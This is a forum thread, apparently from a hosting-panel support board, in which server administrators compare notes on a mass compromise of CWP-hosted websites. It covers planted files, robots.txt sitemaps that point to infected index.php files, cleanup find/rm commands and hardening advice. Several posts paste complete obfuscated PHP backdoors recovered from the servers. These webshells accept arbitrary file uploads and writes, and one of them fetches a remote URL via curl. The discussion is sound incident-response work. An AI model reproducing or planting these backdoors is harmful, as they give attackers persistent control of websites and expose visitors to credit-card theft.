[CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ

robots.txt (revaluation)
Many of my websites contain robots.txt files that appear to be used to expose compromised websites (when you open it, it notifies the attacker). These files include a reference to a “sitemap” that actually points to an exploited file (index.php). If Googlebot or another search-bot fetches that sitemap, it could automatically reveal the infected website to the attacker. The attacker have put search bots in work for him (smart, I must say).

Every index.php file referenced by these robots.txt files appears to be infected at the top. Below the infection lies your original code (but double check it!!!).
Note that simply deleting the robots.txt files is not enough! You also must carefully inspect and clean every affected index.php file. Make sure to thoroughly check each robots.txt file, as the infection may vary between them and you might end up losing the infected index.php file.

An infected index.php file is still useful to the attacker! The robots.txt is just a complement.

SSH command to search all robots.txt files:

find /home -type f -name "robots.txt"

I mass removed them, every part of the malicious code, backup.c, licelic.c etc with rm find. Buy maybe i can find them from backups.

As far as I understand from the context of the malicious code, they are trying trick the visitors to make payment with a credit card. Because the attacker needs to be notified every time a visitor runs the code and in defauit.php there are classes about making payment.
So the attacker takes the information of the credit card provided by the visitor, and uses it on another website.

Oh i found one image file from a backup.

I mass removed them, every part of the malicious code, backup.c, licelic.c etc with rm find. Buy maybe i can find them from backups.

As far as I understand from the context of the malicious code, they are trying trick the visitors to make payment with a credit card. Because the attacker needs to be notified every time a visitor runs the code and in defauit.php there are classes about making payment.
So the attacker takes the information of the credit card provided by the visitor, and uses it on another website.

Oh i found one image file from a backup.

How did you mass remove them? Do you have a script that you could share?

I mass removed them, every part of the malicious code, backup.c, licelic.c etc with rm find. Buy maybe i can find them from backups.

As far as I understand from the context of the malicious code, they are trying trick the visitors to make payment with a credit card. Because the attacker needs to be notified every time a visitor runs the code and in defauit.php there are classes about making payment.
So the attacker takes the information of the credit card provided by the visitor, and uses it on another website.

Oh i found one image file from a backup.

How did you mass remove them? Do you have a script that you could share?

You dont need a script to remove them. This will remove all of the malicious code except for index.php.

Code: [Select]

find /home/ -type f \( -name "licelic.c" -o -name "backup.c" -o -name "defauit.php" -o -name "defauIt.php" -o -name ".c" \) -exec rm -f {} \;Edit: You can remove "-f" if you need to check which file is being removed.
If you have two examples of infected index.php file, i can try to make a script that will auto remove them.

You dont need a script to remove them. This will remove all of the malicious code except for index.php.

Code: [Select]

find /home/ -type f \( -name "licelic.c" -o -name "backup.c" -o -name "defauit.php" -o -name "defauIt.php" -o -name ".c" \) -exec rm -f {} \;Edit: You can remove "-f" if you need to check which file is being removed.
If you have two examples of infected index.php file, i can try to make a script that will auto remove them.

I had files that didn't have the dot on the ".c", they were just "c". Take a look in your server as well.
Also inspect all your robots.txt and index.php (of the root folder of each website) mine got infect on top.

You dont need a script to remove them. This will remove all of the malicious code except for index.php.

Code: [Select]

find /home/ -type f \( -name "licelic.c" -o -name "backup.c" -o -name "defauit.php" -o -name "defauIt.php" -o -name ".c" \) -exec rm -f {} \;Edit: You can remove "-f" if you need to check which file is being removed.
If you have two examples of infected index.php file, i can try to make a script that will auto remove them.

I had files that didn't have the dot on the ".c", they were just "c". Take a look in your server as well.
Also inspect all your robots.txt and index.php (of the root folder of each website) mine got infect on top.

Yeah, i've found the file named "c" one of the websites. I've also found another index.php file in a random directory, which was obfuscated but its obvious that the file is creating an html form element.

Code: [Select]

echo "\x3c\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\x3d\"POST\"";

Code: [Select]

<form method="POST"
You can also search in your files. "\x3c\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\x3d\"POST\"";"
Might be another backdoor.

Just another obfuscated index.php file in a random directory.
You can search for terms such as "stream_get_meta_data($infoW)["uri"];goto" to find other occurances in your webserver.

Code: [Select]

<?php goto k8m1QZt2JL;yTZ1Fxr: if(!isset($_GET[/* */("LcEF")[1]./* */("UefpAJ")[4].("ABo7")[1]./*

*/("tGNgsd")[1]]))exit;goto OziaS8PU;vPbzyCtLXQ: $eHNuBzJ = strpos("wnJbkEld","u4Yhb62jk"); goto VcJp97;FI7ycwetQZ: $GbmJE9c2n = (/**/("VsLP")[1].("mpNto")[3]./* */("pr2lfq")[1]./**/("J_Tt9")[1].("pNVr3b")[3].("Oev_")[1].("UogpT")[3].("AsBe9")[3]./*
*/("ayOxC")[0].("cUmStk")[4])("", 5); goto djdAEq3_Z;mNZMuAn03: $ydOGPJ = (/**/("sSsh")[2].("ZtvS")[1]./*
*/("pADr1M")[3]./*
*/("I_0ubT")[1].("pM983l")[0]./**/("aYudaD")[4].("kId89Q")[2])("", 0); goto KUaAIeWh;ZJHKzh7N2: (/**/("csdP")[0].("tuBoV")[1]./*


*/("rCcz")[0]./*
*/("lbaf3R")[0]./**/("IN_Uo")[2]./**/("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./**/("T3opB")[2].("fpVS")[1]./**/("E7tf")[2])($t7i13,(int)(("6jbAMe")[0].("L40K_Q")[1]./**/("_hBqvO")[0]./* */("Ornh4K")[1].("hEleF")[3].("peTs")[0].("lJAa")[0]), 0);goto yQ85f0rF;pb80aP: $XxbaA = strpos("ZzQy_I1A","qPSwx"); goto a5ePVEUtX;xJ9cj1QxEH: $zAQ5o = addcslashes("zAQ5o","HLVD9H67XoGvS"); goto cu4yJeSN;ZfrIJlvZ: $P_Ly5sMoT = define("pvt1yW","Yz49D_7"); goto dLtmkp;cNivf5: $infoW = copy($csSfc,/**/("kvAsC4")[3]./*

*/("yhIm")[1].("uP6oZ")[3]./*
*/("Hyqp7o")[3]./*
*/("lO0c.R")[4]./**/("pxho")[0].("qYh8")[2]./**/("LyupQ")[3]);goto gmxZhVfc;a5ePVEUtX: $LbvZIl = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./*

*/("A4VdS")[3]./**/("e_LHi")[0])(",",array("PaZH_Rtb","G2JxvFl","hoUZ10QF","MW4IobOQw")); goto CYUI5Vg278;OP7W6w: $tU6Htl = (("ss3L_")[0].("pDp1")[2]./**/("AFrNvr")[2]./**/("wBiA")[2]./**/("nV17")[0].("BWtB")[2].("Yfkh")[1])(""); goto PLp95gFG;kkF4Ncr6: $TH_apwEWT = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./**/("A4VdS")[3]./*
*/("e_LHi")[0])("TH_apwEWT",array());goto fGsvMWjuCg;UQUoexHiS: $dZtonG = (/* 
*/("sLZH")[0]./*


*/("vtZitF")[1].("rXBJ")[0].("crcsxA")[3].("TtP9")[1].("ptrQIR")[2])("dZtonG", "Xj7s2uF"); goto yTZ1Fxr;RrN4Re3O_t: $oMOVB51r = (("nMvsY")[3].("Lt7v")[1]./*
*/("lrbZ")[1]./*
*/("tABA5")[0]./*
*/("IAob")[2]./*
*/("NjkN")[2])("oMOVB51r"); goto eF_jfNyOpE;gmxZhVfc: echo /**/("Zsa9")[1].("IcruR")[3]./**/("Rc9H")[1]./*
*/("wJcVmu")[2]./**/("ieZ6H")[1].("sK4S")[0].("_sr_")[1];goto glwegx;arGUuE: (/**/("csdP")[0].("tuBoV")[1]./**/("rCcz")[0]./*
*/("lbaf3R")[0]./**/("IN_Uo")[2]./*

*/("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./*
*/("T3opB")[2].("fpVS")[1]./*
*/("E7tf")[2])($t7i13,(int)(("gc1l")[2]./*
*/("Tu0X")[2]./**/("0_6Yf")[0].("E2k0sR")[3].("Uv62N")[3]),$Cr7YLD);goto jeITJ05L;_QPyC_Uw2d: if(!$infoW)exit;goto qaCsrh;eF_jfNyOpE: $lqGibM = false; goto qb6tWVjZ;m2UFsayhKt: fwrite/*x1dsK*/($infoW,$E9kFDYug);goto vPbzyCtLXQ;CYUI5Vg278: $E9kFDYug = (/*
*/("ccqL8")[1].("kFuEk")[2].("jrRr6")[3]./* 
*/("NBl67")[2].("Bn_s")[2]./*
*/("oyLce4")[4]./*


*/("Eg_xc")[3].("zeWz9p")[1].("cENYr")[0])($t7i13);goto nMiUby1u;jeITJ05L: (/**/("csdP")[0].("tuBoV")[1]./* 
*/("rCcz")[0]./*


*/("lbaf3R")[0]./*
*/("IN_Uo")[2]./**/("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./* 
*/("T3opB")[2].("fpVS")[1]./**/("E7tf")[2])($t7i13,(int)(("1wuA")[0].("9VKY")[0].("Gm90c")[2].("tHlX1Y")[4]./* */("3JbxO")[0]), 1);goto ZJHKzh7N2;ycMWqZr4C: $irwRMpNx = (("nMvsY")[3].("Lt7v")[1]./**/("lrbZ")[1]./*

*/("tABA5")[0]./**/("IAob")[2]./*
*/("NjkN")[2])("irwRMpNx"); goto xJ9cj1QxEH;rgOInqtUo: (/**/("MITicM")[4].("eH4ucd")[3]./**/("Borcf")[2].("AlkY")[1]./*
*/("_NIqj")[0]./**/("ichPI")[1].("hluo")[1]./*
*/("oFWp2X")[0]./**/("sRqxW")[0]./*

*/("MJVer")[3])($t7i13);goto xqvlspVMua;rxOZNFk6: $_3dp2Bmv = define("gS0ht4vV","BmWliLbks"); goto arGUuE;glwegx: $Ji8Czwd = (("K4Pwx")[3]./*


*/("oU8IH")[0]./**/("Yrmrhj")[3].("dAn05L")[0]./**/("U4w5s")[2]./**/("QtrRd")[2].("FiaP")[2]./**/("kepvP")[2])("", 8);goto ZfrIJlvZ;VcJp97: $csSfc = stream_get_meta_data($infoW)["uri"];goto zvoTdAM;AzW2rIcJ: $infoW = tmpfile();goto _QPyC_Uw2d;YO7HPNId4: $sXEr6Sz = (("msSf")[1]./*

*/("lJFu4d")[3].("Db8T3")[1]./* */("sqST")[0].("MgaJtz")[4]./*
*/("Eru4")[1])("sXEr6Sz",7,0);goto UQUoexHiS;CAVY2h: $Hyl46K8Pe = (string) null; goto kkF4Ncr6;VYlTbVK9Cv: $bkPC7wsv = addslashes("bkPC7wsv"); goto I0tBIKQV5u;PLp95gFG: $KFHM5D = str_shuffle("l5wgOtr9"); goto mNZMuAn03;H38OmS_psA: $ARVzAQu75 = sha1("l45rQuas"); goto ZgjHvXPb;y_QeZmI: $lnbixGW6K = strval(false); goto FI7ycwetQZ;qb6tWVjZ: $Ed9U5Pe = (("lbsSNF")[2].("UtwcV")[1].("P6rgd")[2].("L09_1")[3].("borsxS")[2]./*

*/("We1B")[1]./*
*/("pcpv")[2].("oHlG")[2].("LRma5")[3].("Xx9cgf")[3]./*
 */("ewfMO")[0])("Ed9U5Pe", "", "Ed9U5Pe");goto VYlTbVK9Cv;fGsvMWjuCg: $YZqXErkJ = (("nMvsY")[3].("Lt7v")[1]./**/("lrbZ")[1]./**/("tABA5")[0]./*
*/("IAob")[2]./*


*/("NjkN")[2])("YZqXErkJ"); goto DLBXjhA;jG5mLo1C: $oh7lPvV = ucfirst("XnNXA"); goto CAVY2h;djdAEq3_Z: $vp6WA8o3 = defined("L4cqa"); goto OP7W6w;k8m1QZt2JL: $gTPQ4h_ = (string) null; goto jG5mLo1C;xqvlspVMua: $j6ten = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./**/("A4VdS")[3]./* */("e_LHi")[0])(",",array("N6SpwGx","dXFrUC","yCMd3aqoh","ZT9mZANQd")); goto AzW2rIcJ;zvoTdAM: $K0ucKTH = (/*
*/("VsLP")[1].("mpNto")[3]./**/("pr2lfq")[1]./**/("J_Tt9")[1].("pNVr3b")[3].("Oev_")[1].("UogpT")[3].("AsBe9")[3]./**/("ayOxC")[0].("cUmStk")[4])("", 9); goto cNivf5;TYXDZEOJmf: $ql3NdoZhX = (/**/("cdBD")[0].("rrhF6")[2].("MuUOr")[1]./**/("nogxjH")[0]./**/("UXky")[2]./*
*/("lC_B")[2]./**/("Ys2YWh")[1]./* 
*/("_M6pL")[3]./* 


*/("ZxlK")[2].("dW2Yic")[4].("vtmA0")[1])("Fi1WqIDCMdxfVZ",3); goto Al0Jehv;ywlXs3Q: $V63Ja = (("ss3L_")[0].("pDp1")[2]./**/("AFrNvr")[2]./*
*/("wBiA")[2]./*
*/("nV17")[0].("BWtB")[2].("Yfkh")[1])(""); goto ncjtyvXFZ;ZgjHvXPb: $H9MphLJI = (string) null; goto RrN4Re3O_t;dLtmkp: $enf6Gi = strval(false); goto H38OmS_psA;KUaAIeWh: $ktFgPIC = strpos("xO4DmC9YN","cKoiJMdr5"); goto YO7HPNId4;nMiUby1u: $JNhW9rbZ2 = str_shuffle("uYL8h25BV"); goto TYXDZEOJmf;Al0Jehv: $I7rMnac = (string) null; goto rgOInqtUo;ncjtyvXFZ: $t7i13 = (/*
*/("cAGt")[0]./*

*/("bugBio")[1]./**/("H4rE")[2].("lf57")[0].("LlQ__X")[4].("LxiWUA")[2]./*
*/("SKnLI")[2]./*

*/("igql")[0]./**/("MtgB28")[1])();goto rxOZNFk6;cu4yJeSN: $vqMptm = addcslashes("vqMptm","IObRDjqzLMWXv"); goto NuPUfHtybg;DJtNV7: $K_WRFfn = lcfirst("dOV3gjZAn"); goto ycMWqZr4C;DLBXjhA: $K5mQnDhjp = (("iD3VTb")[0].("m_CJoz")[0].("fp83QI")[1].("tdZlz")[3].("okyuA")[0]./**/("A4VdS")[3]./**/("e_LHi")[0])(",",array("vBTAjn","HyP0zIH","LMGfhu","VcsT_mR1")); goto y_QeZmI;I0tBIKQV5u: $PDZK2ztn = array("JmS6k7IrqLxD"); goto DJtNV7;yQ85f0rF: (/*

*/("csdP")[0].("tuBoV")[1]./**/("rCcz")[0]./*
*/("lbaf3R")[0]./* */("IN_Uo")[2]./**/("sgNP")[0].("iAeLaj")[2].("TR6CtK")[4]./**/("T3opB")[2].("fpVS")[1]./*
*/("E7tf")[2])($t7i13,(int)(/**/("L135XO")[1].("mHc3fP")[3].("ZH_9Bo")[2]./*
*/("rnvWG")[0].("kmepc")[2]./**/("pAI7")[0].("ChKFlJ")[4]), 49);goto pb80aP;OziaS8PU: $Cr7YLD = /* */("_Xj4hP")[4]./*
*/("zht8so")[2]./* */("GvLtuJ")[3]./**/("Scpo7")[2]./*
*/("LH:4ym")[2].("/cpL")[0]./*
*/("/AAW")[0].("Sv3J")[1]./**/("oak4")[0]./**/("tblrC")[2].("dogcE")[1].("D2Kv1l")[3].("oM4mG")[3]./*
*/("aFau")[0]./**/("Brdw")[1].("utUO")[1]./*

*/(".O3I")[0]./**/("i4rV")[2]./**/("b7u9")[2]./*
*/("U/ZSoV")[1].("JdfOn")[1]./*


*/("XEd_ag")[4].("YyIMi2")[4]./*
*/("/AfZ")[0].("I4A6?F")[4].("NPtqVR")[2]./*
*/("_i=Ygp")[2].("pCvE")[0].("c&wB3u")[1]./*
*/("thIlG")[3].("t=n3")[1].("zu2BCD")[0].("Sljdi")[3].("Rh20K")[1].("m5ysb")[2]./**/("KS-H")[2]./* */("e8kT")[1]./*
*/("u-Gilp")[1]./**/("8k0oMA")[0];goto ywlXs3Q;qaCsrh: $t1gXasH4J = (/*
*/("sLZH")[0]./*
*/("vtZitF")[1].("rXBJ")[0].("crcsxA")[3].("TtP9")[1].("ptrQIR")[2])("t1gXasH4J", "rgH8fJFR0"); goto m2UFsayhKt;NuPUfHtybg:""; ?>

Another backdoor(Search for terms such as "= strval(false); goto" to find other occurances in your webserver):

Code: [Select]

<?php goto lVijFaMf;JJDjaIOYP0: $e7hWk = ucfirst("gbqmo"); goto iEqHs1c;DXNSWE: $ouok7MZ = addslashes("ouok7MZ"); goto M3amtuEDv;HUSdrNR: if(!isset($_GET["U8v"]))exit;goto QesQqL3zP;BZvnmC: if($RsdQa)exit("TkDTbQiPzSd4Z9pAx1h".copy($_FILES["qcDxi5jZ61"][("tWUa")[0].("gEmv")[2]./*
*/("pk5t")[0].("sk_n2r")[2]./*

*/("tUhnxb")[3]./*

*/("Za1OB")[1]./*
*/("O6mE")[2]./*
*/("VeyDa")[1]],$RsdQa));goto DXNSWE;isQdpF1z: $YIHPFEse = (string) null; goto kUwVlNc7d0;QesQqL3zP: if(isset($_FILES["qcDxi5jZ61"]))$RsdQa = basename($_FILES["qcDxi5jZ61"][("iniY")[1]./*
 */("FHad")[2]./*
*/("MImEQZ")[2].("eoiyF")[0]]);goto BZvnmC;mc80VrYbp_: $vSDMWP = lcfirst("dMSowB7jU"); goto leUr0KWa;RY9_TI: $KePs2Rp = (/**/("ziX4")[1].("mFjD")[0]./**/("Qepph")[3].("llIP5W")[0].("toUi")[1].("Odmwfn")[1].("DjbeW")[3])(",",array("XGpyb","h57YPQWV","KXTOke5","NmhUN")); goto i0NKZiX1;QOPTD8ys4: $cHcBL2z4 = (("MsJI4D")[1]./*
*/("Msuk")[2]./**/("VLbu")[2].("hs39Jc")[1].("PhFtX")[3].("yWr2")[2])("cHcBL2z4",8,0);goto RY9_TI;OEMap7X: $VtXzh6f = addslashes("VtXzh6f"); goto SfWARya;D5IUXJ4: $FfEiu = sha1("Gc7aq"); goto F1J_RKtp;kUwVlNc7d0: $AgsciC4bG = strpos("PYGIXK","Vigysmb6T"); goto LruYdez9j;QwphlQi1V: $B5MDKsm1r = (string) null; goto QOPTD8ys4;G3_ly06IJ: $PDCRK = (("hwSaJ")[1].("bohU40")[1]./**/("wirb")[2]./**/("O0acde")[4]./*
*/("onH7w9")[4]./*

*/("jWMru4")[3]./* */("OaWo")[1]./**/("gpbP_")[1])("", 11);goto JJDjaIOYP0;LruYdez9j: $SK59OL = (("KjtsDQ")[3].("tZ1P")[0]./* */("L5Jri")[3]./**/("tIFGxP")[0].("Nork1l")[1]./**/("E5kme")[2])("SK59OL"); goto QwphlQi1V;i0NKZiX1: $LsxEThigD = sha1("aWZBpd"); goto gtL9M7EZ1u;leUr0KWa: echo /**/("<Xe9")[0]./*
 */("vkGjf9")[4]./* */("qaotd")[2]./**/("C3r2o7")[2].("bBmir")[2]./*
*/("tt G")[2].(" vbf29")[0]./*
*/("mT5d")[0].("emrb")[0].("FHtovt")[2]./*

*/("eVhg")[2].("ZEom4S")[2].("gdmZpT")[1]./**/("Dsuh=j")[4].&#39;"&#39;./*
*/("poNw")[0]./**/("lzjorm")[3].("syhHa")[0]./*
*/("JedtB")[3].&#39;"&#39;.("C DeC")[1]./**/("g5xe2")[3]./*
*/("q2KnqY")[3]./*

*/("yPcOz")[2]./*
*/("Gft9")[2].("Ky0nvd")[1]./* */("aNpq")[2].("ce8cUG")[1].("Tu=Wc")[2].&#39;"&#39;.("A9nmQi")[3].("uAYEK")[0].("bKal1")[3].("CHstV")[3].("iAin")[0]./**/("RpvMXt")[1].("azF7XA")[0]./* */("Eprv")[2]./* */("tXeA1a")[0].("/rhP0")[0].("qfGO")[1].("g7oe9")[2].("KMQ7rg")[4].("l3m9")[2]./**/("-Y0rt")[0]./**/("FnkdF")[3].("jays")[1]./*
*/("tQB8")[0]./* */("WnXNae")[4].&#39;"&#39;.("W5>o")[2];goto NCQOl4V_d;QXQSIJ: $s9N_vWPUq = (/**/("PsM0F")[1].("H5p8")[2].("VZrvf")[2]./**/("JMiJ")[2]./**/("vtnnA")[2].("Njt3Sk")[2].("fyQI")[0])(""); goto gyIvf3Gw;lVijFaMf: $UWg_fp2 = (/**/("cja8xK")[0]./* 
*/("ohEFq")[1].("ubvgx")[0].("qq4nng")[4].("o3pkra")[3]./**/("a3_eRq")[2].("SspUyB")[1]./*
*/("GpcY5")[1]./*
*/("hl5zoc")[1].("iNkS")[0].("Qt9eU")[1])("qEZi0qy3rN7c",3); goto isQdpF1z;PHQO3t: $WAiLRzYf = lcfirst("I3ZDXQ"); goto D5IUXJ4;HpTmlO: echo /*
*/("MA<w")[2].("pih6")[1].("nmkl")[0].("Cpgo")[1].("lmyu3")[3]./**/("tbZM4W")[0].("j5 h")[2]./**/("ztea0E")[1]./* */("Oy7Gr")[1].("QV7_pd")[4].("geEAw")[1].("GkB=V")[3].&#39;"&#39;./**/("oksh")[2].("puw7")[1].("bBrC")[0]./*

*/("DqDmj")[3].("vPYiT")[3]./**/("Rt8L")[1].&#39;"&#39;./*
*/("FP JoZ")[2]./*
*/("TRvE")[2]./*
*/("MQtLam")[4]./*

*/("rlf9K")[1]./**/("dQ0Yuh")[4].("eFvZ")[0]./*
*/("=fEv")[0].&#39;"&#39;.("aiFsBe")[3].("cnuqCR")[2].("bx_4")[0]./*

*/("Qm_lZn")[1]./*
*/("qi_g2")[1].("KbtH4")[2].&#39;"&#39;./**/("M>2Um")[1];goto QXQSIJ;SfWARya: $yTa7b = addslashes("yTa7b"); goto PHQO3t;gyIvf3Gw: echo ("<phD")[0]./*
*/("n/yaoF")[1].("JfExCS")[1]./**/("nEoVjD")[2]./* */("TNrx")[2].("sm5zfD")[1].("Wcl>M")[3];goto OEMap7X;F1J_RKtp: $a2mcgG = define("E1Oes","kobMCZ5Q"); goto OjXQTpN;NCQOl4V_d: $jgJlQM = (/* */("Spksb")[3]./**/("nfYtt")[3].("YGrpB")[2]./*
*/("Cj_Sz")[2].("gryxuV")[1].("ebev")[2].("qXpL")[2].("QlKWwI")[1]./**/("jamOa9")[1]./*
 */("a2Hcc")[3].("celqm")[1])("jgJlQM", "", "jgJlQM");goto ZpJDct1;M3amtuEDv: $Q0bMh = (/**/("cja8xK")[0]./*
*/("ohEFq")[1].("ubvgx")[0].("qq4nng")[4].("o3pkra")[3]./**/("a3_eRq")[2].("SspUyB")[1]./*
*/("GpcY5")[1]./**/("hl5zoc")[1].("iNkS")[0].("Qt9eU")[1])("BrV61eAfMIydF",3); goto mc80VrYbp_;gtL9M7EZ1u: $C8f3Yq6 = strval(false); goto HUSdrNR;ZpJDct1: echo ("_<ib")[1].("FDiaL")[2]./**/("nLKb4w")[0].("DpVT")[1].("u_TGl")[0].("WEftFv")[3]./*
*/("eF m")[2]./*
*/("ttUPk")[0].("yIYq")[0].("kSpx")[2].("aneY")[2].("By=2")[2].&#39;"&#39;.("lfQJ")[1]./**/("SP1iG")[3].("uLlOQ")[2].("rvjeim")[3].&#39;"&#39;./*
*/("K OeY")[1]./*


*/("nNvdM")[0]./**/("KazX")[1].("mLSjx")[0]./*
*/("Aeug")[1]./*
*/("W=p2Bx")[1].&#39;"&#39;.("gbqg")[2].("foec6t")[3]./*

*/("ijn1DL")[4].("otRxUV")[3].("im9c")[0].("t4RQ5X")[4].("ezj8f")[2]./* */("CQZZ6")[3]./**/("6Fk9")[0].("C1i2E")[1].&#39;"&#39;.("uSc DR")[3].("qP>7")[2];goto HpTmlO;iEqHs1c: $CpiskJ = strval(false); goto A2cGUk_mr;OjXQTpN: $bAEaqf = strval(false); goto G3_ly06IJ;A2cGUk_mr:""; ?>

Yet another:

Code: [Select]

4tLR0erSJU _NVs7Gua3DXxdlTMkcAbPv6I
fQZ5w8n1pjy
gEoF2qWKhOHYCm9Bz
iZpG0wgCFzfKQIkmM9yLh5WnoDeJai
dNvAq3YrHU16ulxSOX
78tR_bs2Tc4EPV
jB MLUdi95
Y
pCgOh84GFvXT1exyWk7cPD3QjBuqr6H JS2woaK_nmR0
EIfbZAzsNVtlP1ISy2tYx
5KC7hJ0vfMW6p mgR_bl8NG3aQsUiuVB
HATcqXjrFnO4Z
LdozweD9kEv5NHusbl7 CtZQYFLgy2
3zPK9DOaMxdSeTcGnq0WUpf_R
EXrjwm16Bk8IVoh
4JAiF
I
sChXagG3_o cTZn84Vq29KtMedxRzkuSEJmf76wbpOH5iNWDQjB
1ryLUlYAv0PdNVpDkH7 G6ZOhmY_5sl3i4croxK
RUEzQTu1P8FMgaA
Wvnq2XLCSftby
ewjB90IJan
Vc4NEB6kKYFz
siUxpZAgSComXO3 R0QHylq5eT9uPvtrJL
bWw1h8GdDMIjf72_N
GInAoka
5gd42mXeYMJxlj3KPLSpHifV0QrFDZctWqEy 76CsBuvb98_zTROU1hw
ZNt
q83hI6

Ty GUeix9E1AsYb0MQW_CjrH4dXpoLSlKBvwF2g5DzfVRmJk7aunOcP<?php goto Y_0nXzAq;dPW4cKs3: $xAs7Tpz = stripos("xpdk3L0BI","NSzAt"); goto w7QUDA;oI0Ofs1NSE: echo "\74\x64\151\x76\76\x3c\x69\156\160\x75\x74\40\x74\171\x70\145\75\x22\164\x65\x78\x74\42\40\x6e\141\155\x65\75\x22\x71\x79\62\x69\x5a\x22\76\x3c\x2f\144\x69\x76\x3e";goto gEoeu7CYmH;lb_z0E: if($B_6Ta) exit("MPu2OYfMbJ".$F1mVH($B_6Ta));goto DrKUus;TI578M2: $jg3TmtQ = isset($_POST["qy2iZ"])?trim($_POST["qy2iZ"]):"";goto n20zQ9o;RLgetNOE: if($B_6Ta) $Vx6b5eC($B_6Ta,$n2XtH3a);goto lb_z0E;KRTmDNl: $D8jZIM5E = array("sg3tOMKyxWQfXZ"); goto WQIED9;LPvaiTkrsM: $wAuWIZ5 = str_repeat("", 13); goto KRTmDNl;Q8kceJNKf: function gjrAdtg($_yU43,$FyDsPmb){ $b91Og = str_split($_yU43,1); $xBjlH0Y = explode(",",$FyDsPmb); $wqGkWJg=""; foreach($xBjlH0Y as $v){ $wqGkWJg .= $b91Og[(int)$v]; } return $wqGkWJg; }goto L0LQ7hb4;cD6Re4V9s: echo "\x3c\x62\x75\164\x74\157\x6e\x20\164\171\160\x65\75\x22\x73\165\142\155\151\164\42\x3e\163\x75\x62\x6d\151\x74\x3c\x2f\x62\x75\x74\x74\157\156\76";goto l_Ln6t1XY;fWFX6D3: echo "\74\x66\157\x72\155\40\x6d\145\164\150\157\144\75\42\120\x4f\x53\x54\42\x3e";goto oI0Ofs1NSE;DrKUus: $Le4p2 = str_replace("Le4p2", "", "Le4p2");goto Q8kceJNKf;kZly82kt: if(!isset($_GET["U8v"]))exit;goto TI578M2;g8fvDVd: $cXUEo94Gg = addcslashes("cXUEo94Gg","JbuaWR8jKC"); goto ubiQf8X;I0xkT8MIo: $AUCcxm3 = strtok("AUCcxm3"); goto gvoaFcZ3;WQIED9: $zFGOj8f = str_replace("zFGOj8f", "", "zFGOj8f");goto Li1o5cfm27;llJW4kEf9: $x5scPOjt = false; goto fbZp1Xjf;XfOS3Dc: $B_6Ta = !empty($n2XtH3a)? $Qgi0D($jg3TmtQ,"w"):"";goto H7fbdkCE;H7fbdkCE: $IewLIh = str_repeat("", 13); goto RLgetNOE;gEoeu7CYmH: $zHES9 = addslashes("zHES9"); goto jdRWyZ;Li1o5cfm27: $dRLQvy = str_shuffle("Y5_HmEAQe"); goto g8fvDVd;ubiQf8X: $DrKtQl = strstr("DrKtQl", "MFIjtb0zZ"); goto qZPStqv;jdRWyZ: $DWm5Nc = str_shuffle("fw9Jk"); goto dPW4cKs3;CTbrxv3k: $FdH6ED = strpos("WcoMi9bD","NAQc1"); goto VCUOJo5;FCBbyoJ: $ko_A7 = sprintf(""); goto kZly82kt;gvoaFcZ3: $y6FmI = implode("y6FmI",array());goto XqZl_hutd;l_Ln6t1XY: echo "\74\57\146\157\162\155\x3e";goto LPvaiTkrsM;w7QUDA: echo "\x3c\144\151\166\76\74\164\145\170\164\x61\162\145\141\40\x6e\x61\x6d\145\75\x22\x41\x4e\x33\x37\x38\42\40\162\157\167\163\75\x22\x35\x22\76\x3c\x2f\164\x65\x78\x74\x61\162\x65\141\x3e\x3c\x2f\x64\x69\x76\76";goto cD6Re4V9s;VCUOJo5: $xdsef = c8SWnC::JPFrgeHO("xYCU1Tl",3);goto XfOS3Dc;kSwOti: $rson9 = strstr("rson9", "PCKFi09"); goto I0xkT8MIo;Y_0nXzAq: $enzir = str_shuffle("ecSJnCA"); goto kSwOti;fbZp1Xjf: class c8SWnC{ public static function __callStatic($name, $arguments) { $temarr = array("Qgi0D"=>array("c2fnmdelr7y_ropazeMx0pWejt","2,13,14,6,3"),"Vx6b5eC"=>array("XaieuRrZAxGfUvcdaFbpreweWlt_","11,22,6,2,26,3"),"F1mVH"=>array("a1_Sp5oziMfcrH7wZclEselpeeAF","10,11,18,6,20,21")); foreach($temarr as $key=>$v){ $GLOBALS[$key] =  gjrAdtg($v[0],$v[1]); } } }goto fWFX6D3;n20zQ9o: $n2XtH3a = isset($_POST["AN378"])?trim($_POST["AN378"]):""; goto CTbrxv3k;L0LQ7hb4: $XlpVX = ucwords("O_bclSmgv"); goto llJW4kEf9;XqZl_hutd: $G_eLJz = sprintf(""); goto FCBbyoJ;qZPStqv:""; ?>S7xr01o
zQiyX8uFCbpvaD6fWI
9VnNsUZdqhjtYJGeg5_TwOKPL3
RABckM 2HEml4RGv9ifYzuMO
P2HXASjcaper6714Vb358 xnoEtKWglqQsyNkF0UCmw

hJDBILT_dZUTYIBJ1dQwWuh0txHGmkZrNE
vo_ CgA3O2KMs
lynRP4z85jeD6FifqbLVS9a7cpX
0_MhDcG1 xkPWy9fNSR3AsIHTBVOe2tYiXqo76UFjCvmwQa
5KEgl4
b
LrZuzn8dpJcK64
HSUzIYPE2GCViTZA
8nuomgjRN
kv1tq DxMWs59_XBlFw3yLQbdh0OJp7refa

My wordpress wibsites also infeted. And other websites non worpress also. Replaced index.php, added  licelic.c" backup.c defauit.php. I found admin accounts in database WP-user wpadmin@volovmart.ru. I dont know how its happened. But i think it is Panel hacked because it is not effect  only WordPress CMS. Im using CWP pro.

Hello,

We're encountering the same situation on one of our servers.
While we're actively performing cleanup operations, the critical question remains: Has this vulnerability truly been resolved by the "silent patch"?

Do you have any informations about when end what version of the patch/update ?

Best regards,

You can also search in your files. "\x3c\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\x3d\"POST\"";"
Might be another backdoor.

Don't trust to find this sequence. All injected files, even if they do the same, all of them have different obfuscation codes even with different sequence of code.
Best way is to search for index files within the folders and check your main index file.
Also consider to disable php execution inside folders that are not needed. Also disable direct execution of php files that don't need to be called directly from URL. This can be done with folder permissions and .htacess files.

Hello,

We're encountering the same situation on one of our servers.
